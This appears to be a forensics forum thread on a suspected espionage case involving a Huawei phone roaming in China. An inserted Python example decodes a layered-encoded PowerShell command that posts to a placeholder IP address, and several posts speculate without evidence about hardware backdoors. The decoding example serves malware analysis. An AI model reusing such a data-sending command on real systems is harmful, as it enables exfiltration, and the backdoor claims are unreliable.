On a smartphone, are there equivalents of computer Ports?
On smartphones are there the equivalents of Windows processes?
I saw one SANS video wherein the malware used a basic Windows process to send data to a specific IP address. The malware code was obscured by multiple layers of text encoding, but a well-crafted Perl script was able to turn the malware into plain text, thus unmasking the Windows PowerShell command and the remote unfriendly IP server address.
Question: could one use a Harris Corporation Stingray device to trick your Huawei phone and SIM card into thinking the phone was pinging a Chinese cell tower?
I have never personally done it before, but I bet I could dissect a Cellebrite extraction of your Huawei phone and compare a timeline of phone activity to data being captured by the Stingray, to match specific transmissions to specific time points to specific file activity on the phone. Perhaps a chip-off extraction could be performed as well, to see if there are any embedded systems on a chip located on the phone’s motherboard that might bypass Android or iOS.
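The layered-decoding step described in the SANS video above, as an added example that is not part of the post (and not the Perl script it refers to): the encoded blob, the placeholder command and the documentation-range IP address 203.0.113.10 are all constructed here. The script peels base64, hex and UTF-16LE-base64 (the form PowerShell's -EncodedCommand uses) layers until the result reads as plain text, then pulls out any IPv4 addresses so an analyst can turn them into block-list or detection entries.

```python
import base64
import binascii
import re
import string

# Constructed sample: a harmless placeholder command wrapped in three encoding layers
# (UTF-16LE + base64 as PowerShell -EncodedCommand does, then hex, then plain base64).
INNER_COMMAND = "Invoke-WebRequest -Uri http://203.0.113.10:8080/ -Method Post"


def build_sample() -> str:
    """Produce the obfuscated blob an analyst would be handed (constructed, not real malware)."""
    layer1 = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()
    layer2 = binascii.hexlify(layer1.encode()).decode()
    return base64.b64encode(layer2.encode()).decode()


PRINTABLE = set(string.printable)
HEX_RE = re.compile(rb"[0-9A-Fa-f]+")


def looks_like_text(raw: bytes) -> bool:
    """Heuristic stop condition: UTF-8 decodes and almost every character is printable."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return bool(text) and sum(c in PRINTABLE for c in text) / len(text) > 0.95


def try_layer(data: bytes):
    """Try hex, then base64-of-UTF-16LE, then plain base64; return (name, decoded) or None."""
    if HEX_RE.fullmatch(data):
        try:
            raw = binascii.unhexlify(data)
            if looks_like_text(raw):
                return ("hex", raw)
        except (binascii.Error, ValueError):
            pass
    try:
        raw = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        wide = raw.decode("utf-16-le")
        if wide and all(c in PRINTABLE for c in wide):
            return ("base64/utf-16le", wide.encode())
    except UnicodeDecodeError:
        pass
    if looks_like_text(raw):
        return ("base64", raw)
    return None


def peel(blob: str, max_layers: int = 10):
    """Strip encoding layers until nothing decodes any further; return (layer trail, plaintext)."""
    data = blob.strip().encode()
    trail = []
    for _ in range(max_layers):
        result = try_layer(data)
        if result is None:
            break
        name, data = result
        trail.append(name)
    return trail, data.decode("utf-8", errors="replace")


IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")


def extract_ipv4(text: str):
    """Return the distinct IPv4 addresses found in the decoded text, sorted."""
    return sorted(set(IPV4_RE.findall(text)))


if __name__ == "__main__":
    layers, plain = peel(build_sample())
    print("layers peeled:", " -> ".join(layers))
    print("plaintext:", plain)
    print("addresses:", extract_ipv4(plain))
```

The order of attempts matters: a hex string is also a syntactically valid base64 string whenever its length is a multiple of four, so hex is tried first and a layer is only accepted when its output passes the printable-text check.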
Good questions, really. I am just a cryptographer.
It's a plain-sight problem, and the risk of searching too far away is the biggest problem.
For good reasons an engineer travelled to the P.R.C. to join a conference. Mysteriously, while she was in the P.R.C., during the night her device did not charge properly. So far so good; she thought it was a broken charger, but it was not broken. This woman is blessed with sleeping well, but on the third night she woke unexpectedly at 0200h local time and recognised that her device was very hot. She had a T-Mobile SIM card in roaming state with an unlimited data plan. In the P.R.C. she was connected to China Mobile in roaming state.
And this SIM is in our lab.
I know us techies have a tendency to exclusively assess matters from our technical fields of expertise and solve our puzzles like that. We need, however, to take into consideration that technology was, and still is, just a supporting matter when it comes to spying on an emphatically targeted single person.
There are many non-technical factors in this specific scenario that we should take into consideration as well.
From the defensive perspective, the primary question here could be: how plausible is it to specifically target this particular person for espionage purposes? The next question would be: does the country she is traveling to have both the capabilities and the intentions to acquire the data we are trying to protect? There is a big difference between targeting 1 specific person and acquiring general phone usage related data for big data analysis by retail organizations following their customers based on phone usage.
On the offensive side, the alleged aggressor(s) will have asked themselves the same question: will it pay off to specifically target this person? You can have all the technology and data acquisition means in the world, spy on everything and everyone; however, the big dilemma is that you need to process and analyse all that acquired data. When it comes to targeting a specific person, determining the intrinsic value of what you actually acquired is still a manual process.
What I am trying to say here is that in the event the aggressors have determined your engineer is worth being spied upon, there are most likely more efforts pending or already executed to "bring her home" than just trying to get into her phone. The phone issue is just 1 of probably multiple efforts / actions to acquire the confidential data she has under her control.
From the technical perspective, were you able to determine if the charging related malfunctioning and heat issues could be related to anything else than an offensive attempt to acquire data from and / or access to the device in question? This could in essence be nothing more than an ordinary battery malfunction issue.
On a more general note, if your customer, by the nature of their business, could be the target of nation state initiated economic espionage, my advice would be to contact the responsible intelligence or security service. For your country that would probably be the FIS.
Saludos,
Lex
A better question perhaps is why your client did not travel to PRC with burner phones and computers?
I have been told to assume one's electronic devices will be compromised and copied upon entry to the PRC in an automated fashion.
A very capable Android smartphone and laptop computer can both be purchased for a total of US$300.00 (banggood dot com or gearbest dot com).
What if your client's Huawei phone has a chip built in, that once connected to the PRC domestic Internet, generates a mobile backup automatically?
To assume your client was singled out by the PRC, without any supporting evidence, is a bit weak, in my opinion.
An even better question would be what specific Intellectual Property (IP) your client took to the PRC on their laptop and Huawei phone?
IP can be defined as something which the IP owner takes reasonable steps to protect such as future prototype CAD drawing files.
"Not-IP" can be defined as the company's founder's mother's chocolate chip recipe that the company gives out for free to customers.
Personally, I would be much more concerned to find out my company's future business prototype was exfiltrated.
If you use Oxygen/Cellebrite/XRY/BlackLight to collect your client's Huawei phone, you should look at both human generated and system generated file system activities, logs, SQLite database files, data transmission logs UP 3.5 kb / DOWN 4.5 kb for the night your client was in her hotel room in the PRC.
If your client's phone held a 500mb AutoCAD .DWG file of the company's future product, then examine that file and any interaction which may have taken place with that file on the phone during the nights in the PRC hotel.
** I know next to nothing about Cryptography - what should members here at Forensicfocus.com know about Cryptography forensics?
Lex, Larry: good points and aspects worth considering.
You may see my initial post and think a long time about it. For some reasons I cannot reveal more details about the engineer and the institution she works for. As it's an ongoing investigation, it came out that on the hot-device night a large amount of data, consisting of research-enriched science, was downloaded from the home datacenter to the Huawei mobile.
The engineer did not initiate this large data download over roaming. But she was definitely, out of her team, the most legitimate looking person to request the data. For me it looks like this was professional spying in the shadow of a person; no one would detect it as espionage. It had to look like she needed that data for the conference, but that was not the case.
The mobile was just the bridge, it was not about data ON the mobile.
And there we got involved. Employees are free by BYOD and running OWA for UCC. The device in question was a Huawei P20 Pro.
TinyBrain, some observations, but not criticism. If you use acronyms, best you state what you mean the acronym to stand for.
And there we got involved. Employees are free by BYOD and running OWA for UCC. The device in question was a Huawei P20 Pro.
OK, leaving aside the keys with the IT guys. Do you have this phone and/or what examination and analysis has been undertaken? Has the examiner applied any of the suggestions raised by UnallocatedClusters?
Mysteriously, while she was in the P.R.C., during the night her device did not charge properly. So far so good; she thought it was a broken charger, but it was not broken.
How did she know it was broken? Did she buy a new charger? Test the charger on another identical Huawei P20 Pro? Why did this woman not buy a new battery and swap it for the one overheating?
This woman is blessed with sleeping well, but on the third night she woke unexpectedly at 0200h local time and recognised that her device was very hot.
This sounds like those that fed this part of the story to you, TinyBrain, have used artistic licence. They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the copse. …"
What is the significance of the time this woman awoke?
What woke her up - Burning smell, crackling noise coming from phone, what???
and recognised that her device was very hot. She had a T-Mobile SIM card in roaming state with an unlimited data plan. In the P.R.C. she was connected to China Mobile in roaming state. And this SIM is in our lab.
Again, the battery? the charger?
Did anyone test for spyware app (put there by IT guys) on the BYOD device? Spyware is known to cause battery temperature to rise.
Where is the evidence of the T-Mobile data plan traffic usage?
What did the phone's internal data usage reveal?
Still don't see the need for Huawei, if, and only if, they were spying, to reveal their hand with such a stupid approach. After all, TinyBrain, you did mention in your earlier post:
As in the past chip-based backdoors were in vogue, but no more. The new kid in town's name is Software-Defined Networking, e.g. SD-WAN and NFV.
So why would the battery or the charger circuitry be overheating when 'comms' can be (hidden) monitored in the network away from exposure?
TinyBrain, good buddy, sorry if I have got this wrong, and I understand this is not your fault for the story you have been fed, but can we have the forensic aspects of this case and not the speculation? You have identified NO evidence that Huawei has done anything in spying terms other than their make/model of phone 'might' have had a dodgy battery.
They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the copse. …"
Damn.
I was thinking more like "Suddenly she woke up. Clad in her flimsy nightgown, her tall slender figure silhouetted against the moonlight entering from the curtainless window, she felt a cold shiver running down her spine. Something was not right, she felt observed, … " wink
jaclaz
If done well, "calling home" should be done at hardware level, without any trails or logs. If you ask me, I would build this as part of the CPU or the chipset - or both )
Did anybody dissect any Kirin CPU or HiSilicon chip and check if there isn't any built-in backdoor shipped with them?!
I'd start looking for any kind of reserved ranges of the HiSilicon chip.
They may as well have started the story with "It was a dark night. An owl's hoot was heard coming from the direction of the copse. …"
Damn.
I was thinking more like "Suddenly she woke up. Clad in her flimsy nightgown, her tall slender figure silhouetted against the moonlight entering from the curtainless window, she felt a cold shiver running down her spine. Something was not right, she felt observed, … " wink
jaclaz
lol
To assume your client was singled out by the PRC, without any supporting evidence, is a bit weak, in my opinion.
That, I think, is TinyBrain's challenge and why he is posting here.
Rg,
Lex